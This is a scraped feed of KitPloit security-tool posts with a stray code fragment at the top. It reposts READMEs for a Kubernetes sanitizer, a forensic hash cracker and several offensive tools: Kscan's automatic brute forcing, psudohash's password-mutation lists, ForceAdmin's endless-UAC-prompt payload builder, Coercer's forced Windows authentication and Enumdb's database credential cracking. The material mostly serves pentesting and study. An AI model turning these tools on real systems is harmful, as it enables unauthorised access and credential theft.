    # IMPORTANT: all GUID are correspondent to category
    # All function of details have:
    # url Ò†’ with x-force exchange panel
    details.activity(Id, API_KEY), API_KEY)
    details.malware(Id, API_KEY)
    details.industry(Id, API_KEY)

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Popeye - A Kubernetes Cluster Resource Sanitizer

    By: (Unknown) β€” January 22nd 2023 at 11:30

    Popeye - A Kubernetes Cluster Sanitizer

    Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.

    Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!


    Popeye is available on Linux, OSX and Windows platforms.

    • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

    • For OSX/Unit using Homebrew/LinuxBrew

      brew install derailed/popeye/popeye
    • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

      1. Clone the repo

      2. Add the following command in your go.mod file

        replace ( => MY_POPEYE_CLONED_GIT_REPO
      3. Build and run the executable

        go run main.go

      Quick recipe for the impatient:

      # Clone outside of GOPATH
      git clone
      cd popeye
      # Build and install
      go install
      # Run

    PreFlight Checks

    • Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.

      export TERM=xterm-256color


    Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.

    The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

    Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!

    Here is a list of some of the available sanitizers:

    Resource Sanitizers Aliases
    Node no
    Conditions ie not ready, out of mem/disk, network, pids, etc
    Pod tolerations referencing node taints
    CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)
    Namespace ns
    Dead namespaces
    Pod po
    Pod status
    Containers statuses
    ServiceAccount presence
    CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
    Container image with no tags
    Container image using latest tag
    Resources request/limits presence
    Probes liveness/readiness presence
    Named ports and their references
    Service svc
    Endpoints presence
    Matching pods labels
    Named ports and their references
    ServiceAccount sa
    Unused, detects potentially unused SAs
    Secrets sec
    Unused, detects potentially unused secrets or associated keys
    ConfigMap cm
    Unused, detects potentially unused cm or associated keys
    Deployment dp, deploy
    Unused, pod template validation, resource utilization
    StatefulSet sts
    Unsed, pod template validation, resource utilization
    DaemonSet ds
    Unsed, pod template validation, resource utilization
    PersistentVolume pv
    Unused, check volume bound or volume error
    PersistentVolumeClaim pvc
    Unused, check bounded or volume mount error
    HorizontalPodAutoscaler hpa
    Unused, Utilization, Max burst checks
    Unused, Check minAvailable configuration pdb
    Unused cr
    Unused crb
    Unused ro
    Unused rb
    Valid ing
    Valid np
    Valid psp

    You can also see the full list of codes

    Save the report

    To save the Popeye report to a file pass the --save flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

    Example to save report in working directory:

      $ POPEYE_REPORT_DIR=$(pwd) popeye --save

    Example to save report in working directory in HTML format under the name "report.html" :

      $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

    Save the report to S3

    You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report.

    Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.

    Example to save report to S3:

    popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

    If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:


    Run public Docker image locally

    You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

      docker run --rm -it \
    -v $HOME/.kube:/root/.kube \
    derailed/popeye --context foo -n bar

    Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR env variable.

      docker run --rm -it \
    -v $HOME/.kube:/root/.kube \
    -e POPEYE_REPORT_DIR=/tmp/popeye \
    -v /tmp:/tmp \
    derailed/popeye --context foo -n bar --save --output-file my_report.txt

    # Docker has exited, and the container has been deleted, but the file
    # is in your /tmp directory because you mapped it into the container
    $ cat /tmp/popeye/my_report.txt

    The Command Line

    You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

    kubeconfig environment. popeye # Popeye uses a spinach config file of course! aka spinachyaml! popeye -f spinach.yml # Popeye a cluster using a kubeconfig context. popeye --context olive # Stuck? popeye help" dir="auto">
    # Dump version info
    popeye version
    # Popeye a cluster using your current kubeconfig environment.
    # Popeye uses a spinach config file of course! aka spinachyaml!
    popeye -f spinach.yml
    # Popeye a cluster using a kubeconfig context.
    popeye --context olive
    # Stuck?
    popeye help

    Output Formats

    Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

    Format Description Default Credits
    standard The full monty output iconized and colorized yes
    jurassic No icons or color like it's 1979
    yaml As YAML
    html As HTML
    json As JSON
    junit For the Java melancholic
    prometheus Dumps report a prometheus scrappable metrics dardanel
    score Returns a single cluster sanitizer score value (0-100) kabute

    The SpinachYAML Configuration

    A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

    NOTE: This file will change as Popeye matures!

    Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

    A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

    For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

    NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye β€žconfiglessβ€œ to make sure you will recognize any new issues that may have arisen in your clusters…

    Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

    # A Popeye sample configuration file
    # Checks resources against reported metrics usage.
    # If over/under these thresholds a sanitization warning will be issued.
    # Your cluster must run a metrics-server for these to take place!
    underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
    overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
    underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
    overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

    # Excludes excludes certain resources from Popeye scans
    # In the monitoring namespace excludes all probes check on pod's containers.
    - name: rx:monitoring
    code s:
    - 102
    # Excludes all istio-proxy container scans for pods in the icx namespace.
    - name: rx:icx/.*
    # Excludes istio init/sidecar container from scan!
    - istio-proxy
    - istio-init
    # ConfigMap sanitizer exclusions...
    # Excludes key must match the singular form of the resource.
    # For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
    - name: rx:fred.+\.v\d+
    # Namespace sanitizer exclusions...
    # Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
    - name: rx:kube
    - 404
    # Exclude all istio* namespaces from being scanned.
    - name: rx:istio
    # Completely exclude horizontal pod autoscalers.
    - name: rx:.*

    # Configure node resources.
    # Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
    # CPU checks if current CPU utilization on a node is greater than 90%.
    cpu: 90
    # Memory checks if current Memory utilization on a node is greater than 80%.
    memory: 80

    # Configure pod resources
    # Restarts check the restarts count and triggers a lint warning if above threshold.
    # Check container resource utilization in percent.
    # Issues a lint warning if about these threshold.
    cpu: 80
    memory: 75

    # Configure a list of allowed registries to pull images from

    Popeye In Your Clusters!

    Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

    Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

    kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
    apiVersion: batch/v1
    kind: CronJob
    name: popeye
    namespace: popeye
    schedule: "* */1 * * *" # Fire off Popeye once an hour
    concurrencyPolicy: Forbid
    serviceAccountName: popeye
    restartPolicy: Never
    - name: popeye
    image: derailed/popeye
    imagePullPolicy: IfNotPresent
    - -o
    - yaml
    - --force-exit-zero
    - true
    cpu: 500m
    memory: 100Mi

    The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

    Popeye got your RBAC!

    In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

    Sample Popeye RBAC Rules (please note that those are subject to change.)

    # Popeye ServiceAccount.
    apiVersion: v1
    kind: ServiceAccount
    name: popeye
    namespace: popeye

    # Popeye needs get/list access on the following Kubernetes resources.
    kind: ClusterRole
    name: popeye
    - apiGroups: [""]
    - configmaps
    - deployments
    - endpoints
    - horizontalpodautoscalers
    - namespaces
    - nodes
    - persistentvolumes
    - persistentvolumeclaims
    - pods
    - secrets
    - serviceaccounts
    - services
    - statefulsets
    verbs: ["get", "list"]
    - apiGroups: [""]
    - clusterroles
    - clusterrolebindings
    - roles
    - rolebindings
    verbs: ["get", "list"]
    - apiGroups: [""]
    resources :
    - pods
    - nodes
    verbs: ["get", "list"]

    # Binds Popeye to this ClusterRole.
    kind: ClusterRoleBinding
    name: popeye
    - kind: ServiceAccount
    name: popeye
    namespace: popeye
    kind: ClusterRole
    name: popeye


    Cluster D Score

    Cluster A Score

    Report Morphology

    The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:

    Level Icon Jurassic Color Description
    OK Green Happy!
    I BlueGreen FYI
    W Yellow Potential Issue
    E Red Action required

    The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

    The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

    Known Issues

    This initial drop is brittle. Popeye will most likely blow up when…

    • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
    • You don't have enough RBAC oomph to manage your cluster (see RBAC section)


    This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

    ATTA Girls/Boys!

    Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

    Contact Info

    1. Email:
    2. Twitter: @kitesurfer

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Kscan - Simple Asset Mapping Tool

    By: (Unknown) β€” January 18th 2023 at 11:30

    0 Disclaimer (The author did not participate in the XX action, don't trace it)

    • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

    • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

    We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.

    If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.

    Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

    Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.

    1 Introduction

     _   __
    |#| /#/ Lightweight Asset Mapping Tool by: kv2
    |#|/#/ _____ _____ * _ _
    |#.#/ /Edge/ /Forum| /#\ |#\ |#|
    |##| |#|___ |#| /###\ |##\|#|
    |#.#\ \#####\|#| /#/_\#\ |#.#.#|
    |#|\#\ /\___|#||#|____/#/###\#\|#|\##|
    |#| \#\\#####/ \#####/#/ \#\#| \#|

    Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute force cracking on scan results, and is the first open source RDP brute force cracking tool on the go platform.

    2 Foreword

    At present, there are actually many tools for asset scanning, fingerprint identification, and vulnerability detection, and there are many great tools, but Kscan actually has many different ideas.

    • Kscan hopes to accept a variety of input formats, and there is no need to classify the scanned objects before use, such as IP, or URL address, etc. This is undoubtedly an unnecessary workload for users, and all entries can be normal Input and identification. If it is a URL address, the path will be reserved for detection. If it is only IP:PORT, the port will be prioritized for protocol identification. Currently Kscan supports three input methods (-t,--target|-f,--fofa|--spy).

    • Kscan does not seek efficiency by comparing port numbers with common protocols to confirm port protocols, nor does it only detect WEB assets. In this regard, Kscan pays more attention to accuracy and comprehensiveness, and only high-accuracy protocol identification , in order to provide good detection conditions for subsequent application layer identification.

    • Kscan does not use a modular approach to do pure function stacking, such as a module obtains the title separately, a module obtains SMB information separately, etc., runs independently, and outputs independently, but outputs asset information in units of ports, such as ports If the protocol is HTTP, subsequent fingerprinting and title acquisition will be performed automatically. If the port protocol is RPC, it will try to obtain the host name, etc.

    3 Compilation Manual

    Compiler Manual

    4 Get started

    Kscan currently has 3 ways to input targets

    • -t/--target can add the --check parameter to fingerprint only the specified target port, otherwise the target will be port scanned and fingerprinted
    IP address:
    IP address range:
    URL address:
    File address: file:/tmp/target.txt
    • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segment, otherwise only the surviving network segment will be detected
    [Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
    [all]: All private network addresses (192.168/172.32/10, etc.) will be probed
    IP address: will detect the B segment where the specified IP address is located
    • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results, otherwise only the fofa retrieval results will be returned
    fofa search keywords: will directly return fofa search results

    5 Instructions

    usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]

    optional arguments:
    -h , --help show this help message and exit
    -f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
    -t , --target Specify the detection target:
    IP address:
    IP address segment:, subnet mask less than 12 is not recommended
    IP address range:
    URL address:
    File address: file:/tmp/target.txt
    --spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
    (empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
    --check Fingerprinting the target address, only port detection will not be performed
    --scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
    -p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
    -eP, --excluded-port skip scanning specified ports,support:80,8080,8088-8090
    -o , --output save scan results to file
    -oJ save the scan results to a file in json format
    -Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
    -Cn With this parameter, the console output will not be colored.
    -sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
    --top Scan the filtered common ports TopX, up to 1000, the default is TOP400
    --proxy set proxy (socks5|socks4|https|http)://IP:Port
    --threads thread parameter, the default thread is 100, the maximum value is 2048
    --path specifies the directory to request access, only a single directory is supported
    --host specifies the header Host value for all requests
    --timeout set timeout
    --encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
    --match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
    --hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
    hydra options:
    --hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
    --hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
    If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
    --hydra-update Customize the user name and password mode. If this parameter is carried, it is a new mode, and the user name and password will be added to the default dictionary. Otherwise the default dictionary will be replaced.
    --hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
    fofa options:
    --fofa-syntax will get fofa search syntax description
    --fofa-size will set the number of entries returned by fofa, the default is 100
    --fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

    The function is not complicated, the others are explored by themselves

    6 Demo

    6.1 Port Scan Mode

    6.2 Survival network segment detection

    6.3 Fofa result retrieval

    6.4 Brute-force cracking

    6.5 CDN identification

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Prefetch-Hash-Cracker - A Small Util To Brute-Force Prefetch Hashes

    By: (Unknown) β€” November 5th 2022 at 11:30


    During the forensic analysis of a Windows machine, you may find the name of a deleted prefetch file. While its content may not be recoverable, the filename itself is often enough to find the full path of the executable for which the prefetch file was created.

    Using the tool

    The following fields must be provided:

    • Executable name
      Including the extension. It will be embedded in the prefetch filename, unless this happens.

    • Prefetch hash
      8 hexadecimal digits at the end of the prefetch filename, right before the .pf extension.

    • Hash function

    • Bodyfile

    • Mount point

    Hash function

    There are 3 known prefetch hash functions:

    • SCCA XP
      Used in Windows XP

    • SCCA Vista
      Used in Windows Vista and Windows 10

    • SCCA 2008
      Used in Windows 7, Windows 8 and Windows 8.1


    A bodyfile of the volume the executable was executed from.

    The bodyfile format is not very restrictive, so there are a lot of variations of it - some of which are not supported. Body files created with fls and MFTECmd should work fine.

    Mount point

    The mount point of the bodyfile, as underlined below:

    0|C:/Users/Peter/Desktop ($FILE_NAME)|62694-48-2|d/d-wx-wx-wx|...

    How does it work?

    The provided bodyfile is used to get the path of every folder on the volume. The tool appends the provided executable name to each of those paths to create a list of possible full paths for the executable. Each possible full path is then hashed using the provided hash function. If there's a possible full path for which the result matches the provided hash, that path is outputted.


    The following cases are not supported:

    • Hosting applications, such as svchost.exe and mmc.exe
    • Applications executed with the /prefetch:# flag
    • Applications executed from a UNC (network) path

    The 29-character limit

    If the executable name is longer than 29 characters (including the extension), it will be truncated in the prefetch filename. For example, executing this file:

    This is a very long file nameSo this part will be truncated.exe

    From the C:\Temp directory on a Windows 10 machine, will result in the creation of this prefetch file:


    In this case, the executable name cannot be derived from the prefetch filename, so you will not be able to provide it to the tool.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

    By: (Unknown) β€” September 28th 2022 at 20:31

    psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.

    Pentesting Corporate Environments

    System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:


    The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

    transformations = [
    {'a' : '@'},
    {'b' : '8'},
    {'e' : '3'},
    {'g' : ['9', '6']},
    {'i' : ['1', '!']},
    {'o' : '0'},
    {'s' : ['$', '5']},
    {'t' : '7'}


    When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?


    No special requirements. Just clone the repo and make the script executable:

    git clone
    cd ./psudohash
    chmod +x


    ./ [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

    The help dialog [ -h, --help ] includes usage details and examples.

    Usage Tips

    1. Combining options --years and --append-numbering with a --numbering-limit β‰₯ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
    2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.


    I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ForceAdmin - Create Infinite UAC Prompts Forcing A User To Run As Admin

    By: (Unknown) Β·Β (Unknown) β€” September 8th 2022 at 12:30

    ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.



    For building on your own, the following NuGet packages are needed

    • Fody: "Extensible tool for weaving .net assemblies."
    • Costura.Fody "Fody add-in for embedding references as resources."
    • Microsoft.AspNet.WebApi.Client "This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."


    You can download the latest tarball by clicking here or latest zipball by clicking here.

    Download the project:

    $ git clone

    Enter the project folder

    $ cd ForceAdmin

    Run ForceAdmin:

    $ dotnet run

    Compile ForceAdmin:

    $ dotnet publish -r win-x64 -c Release -o ./publish/


    Any questions, errors or solutions, create an Issue in the Issues tab.

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods

    By: (Unknown) β€” September 7th 2022 at 12:30

    A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.


    • Automatically detects open SMB pipes on the remote machine.
    • Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
    • Analyze mode with --analyze, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.
    • Perform coerce attack on a list of targets from a file with --targets-file
    • Coerce to a WebDAV target with --webdav-host and --webdav-port


    $ ./ -h                                                                                                  

    / ____/___ ___ _____________ _____
    / / / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ / __/ / / /__/ __/ / v1.6
    \____/\____/\___/_/ \___/\___/_/ by @podalirius_

    usage: [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
    (-t TARGET | -f TARGETS_FILE) [--target-ip ip address]

    Automatic windows authentication coercer over various RPC calls.

    -h, --help show this help message and exit
    -u USERNAME, --username USERNAME
    Username to authenticate to the endpoint.
    -p PASSWORD, --password PASSWORD
    Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
    -d DOMAIN, --domain DOMAIN
    Windows domain name to authenticate to the endpoint.
    --hashes [LMHASH]:NTHASH
    NT/LM hashes (LM hash can be empty)
    --no-pass Don't ask for password (useful for -k)
    -v, --verbose Verbose mode (default: False)
    -a, --analyze Analyze mode (default: Attack mode)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
    command line
    --dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
    -t TARGET, --target TARGET
    IP address or hostname of the target machine
    -f TARGETS_FILE, --targets-file TARGETS_FILE
    IP address or hostname of the target machine
    --target-ip ip address
    IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it

    -l LISTENER, --listener LISTENER
    IP address or hostname of the listener machine
    -wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
    WebDAV IP of the server to authenticate to.
    -wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
    WebDAV port of the server to authenticate to.

    Example output

    In attack mode (without --analyze option) you get the following output:

    After all the RPC calls, you get plenty of authentications in Responder:


    Pull requests are welcome. Feel free to open an issue if you want to add other features.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool

    By: (Unknown) β€” July 17th 2022 at 12:30

    ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).

    I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of Cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is however, simple to use, decently flexible, and in practice only marginally slower than other "tried-and-true" tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.

    This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:

    • It is capable of brute-force enumerating subdomains and also URI resources (directories/files).
    • Both methods of enumeration require use of an appropriate wordlist or dictionary file.
    • Features Include:
      1. Hostname format supports standard, IPv4, and IPv6.
      2. Support for logging results to a file with -O [filename].
      3. Specifying custom ports for nonstandard webservers with -p .
      4. Optional file extensions in directory mode with -x .
      5. Quiet mode for less distracting output with -Q.
      6. Color can be disabled for less distracting output with -nc/-nl.
      7. Tested on Python versions 3.9 and 3.10, with theoretical support for versions >= 3.6


    ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.

    The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.

    Please Enumerate Responsibly!


    Multi-threaded URL enumeration/brute-forcing tool in Python. (5)

    ZenBuster is licensed under the GNU GPLv3 License, see here for more information.


    Yin-Yang ASCII art in the banners were created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, when specified with: 'zg'.


    Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:

    git clone

    Next, cd zenbuster.


    ZenBuster relies on 3 external libraries to function, and it is recommended to install these with:

    pip install -r requirements.txt

    The modules that will be installed and their purposes are as follows:

    1. Python requests

      • The backbone of each enumeration request. Without this, the script will not function.
    2. termcolor

      • Enables colored terminal output. Non-critical, the script can still run without color if this is not present.
    3. colorama (Windows only)

      • Primes the Windows terminal to accept ANSI color codes (from Termcolor). Non-critical.

    These dependencies may be installed manually, with pip using requirements.txt, or via interaction with the script upon first run.


    Once dependencies have been installed, you can run the program in the following ways:

    On Linux (+Mac?):

    ./ [options] or python3 [options]

    On Windows:

    python [options]


    Short Flag Long Flag Purpose
    -h --help Displays the help screen and exits
    -d --dirs Enables Directory Enumeration Mode
    -s -ssl Forces usage of HTTPS in requests
    -v --verbose Prints verbose info to terminal/log
    -q --quiet Minimal terminal output until final results
    -nc --no-color Disables colored terminal output
    -nl --no-lolcat Disables lolcat-printed banner (Linux only)
    -u <hostname> --host Host to target for the scan
    -w <wordlist> --wordlist Path to wordlist/dictionary file
    -x <exts> --ext Comma-separated list of file extensions (Dirs only)
    -p <port#> --port Custom port option for nonstandard webservers
    -o [filename] --out-file Log results to a file (accepts custom name/path)

    Example Usage

    ./ -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v

    python3 -w ../subdomains.txt --host target.thm --ssl -O myResults.log

    zenbuster -w subdomains.txt -u target.thm --quiet (With .bashrc alias)

    Planned Features/Improvements

    • Increased levels of optional verbosity.
    • Allow optional throttling of task thread-count.
    • Allow users to modify the list of ignored status codes.
    • Allow greater user control over various request headers.
    • Allow optional ignoring of responses based on content-length.
    • Expand subdomain enumeration to include OSINT methods instead of just brute-forcing.
    • Explore a more comprehensive and source-readable solution to fancy colored output (possibly using rich).

    Known Issues/Limitations

    • Enumerating long endpoints may result in ugly terminal output due to line-wraping on smaller console windows. Logging to a file is recommended, especially on Windows.
    • If target host is a vHost on a shared webserver, enumeration via IP may not function as expected. Use domain/hostname instead.

    β˜‘ β˜† βœ‡ – The Hackers Arsenal Tools Portal

    Enumdb Beta – Brute Force MySQL and MSSQL Databases

    By: MaxiSoler β€” March 13th 2018 at 14:11
    Enumdb is brute force and post exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...

    [[ This is a content summary only. Visit my website for full links, other content, and more! ]]